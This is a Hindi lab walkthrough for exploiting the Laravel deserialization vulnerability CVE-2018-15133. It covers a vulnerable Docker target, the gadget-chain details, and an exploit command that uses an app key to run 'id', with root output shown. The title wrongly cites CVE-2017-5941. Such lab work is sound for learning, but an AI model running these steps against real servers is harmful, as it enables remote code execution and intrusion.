
CVE-2017-5941 के साथ डिसेरिएलाइज़ेशन एक्सप्लॉइट का निष्पादन
MExploiting CVE-2018-15133 डिसीरियलाइज़ेशन भेद्यता यह एक्सप्लॉइट Laravel Framework में 5.5.40 तक और 5.6.x से 5.6.29 तक के डिसीरियलाइज़ेशन भेद्यता का फायदा उठाता है।
अविश्वसनीय X-XSRF-TOKEN मान पर unserialize कॉल के परिणामस्वरूप रिमोट कोड निष्पादन हो सकता है। इसमें Illuminate/Encryption/Encrypter.php में decrypt विधि और phpggc में gadgetchains/Laravel/RCE/3/chain.php में PendingBroadcast शामिल है। हमलावर को एप्लिकेशन कुंजी जाननी होगी, जो सामान्य रूप से कभी नहीं होता, लेकिन ऐसा तब हो सकता है यदि हमलावर के पास पहले विशेषाधिकार प्राप्त पहुँच थी या पिछला हमला सफलतापूर्वक किया था।
इस एक्सप्लॉइट को निष्पादित करने के लिए, आपके मशीन पर निम्नलिखित स्थापित होना आवश्यक है:
Docker डाउनलोड और इंस्टॉल करें।
Docker को व्यवस्थापक के रूप में खोलें।
cmd खोलें और docker मशीन को pull करें।
docker pull kozmico/laravel-poc-cve-2018-15133
docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133
यह larvel मशीन को प्रारंभ करेगा।
मशीन काम कर रही है यह सुनिश्चित करने के लिए नेविगेटर में मशीन को खोलने का प्रयास करें।
आप इसे ip और पोर्ट के साथ कर सकते हैं, windows पर ip जाँचने के लिए यह चलाएँ:
ipconfig
Linux पर
ifconfig
wsl --set-default-version 2
wsl --update
एक्सप्लॉइट फ़ाइल को अपने मशीन पर डाउनलोड करें।
एक टर्मिनल खोलें और उस फ़ोल्डर पर जाएँ जहाँ एक्सप्लॉइट फ़ाइल स्थित है।
सर्वर का शोषण करने के लिए निम्न कमांड चलाएँ:
./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id"
यह आपको उस मशीन की ID के साथ प्रतिक्रिया देगा जिस पर आप हमला करना चाहते हैं। आप फ़ोल्डरों का अनुरोध करने और अन्य कार्य करने के लिए समान कमांड का उपयोग कर सकते हैं।
प्रतिक्रिया: uid=0(root) gid=0(root) groups=0(root)
निष्कर्ष के तौर पर, इस भेद्यता में हम फ्रेमवर्क के साथ अद्यतित रहने के महत्व का निरीक्षण करने में सक्षम थे। चूँकि इन उपकरणों में सुरक्षा दोष हो सकते हैं और ये व्यापक रूप से उपयोग होते हैं, यदि हम स्वयं को अद्यतित नहीं रखते तो हम जोखिम में हैं।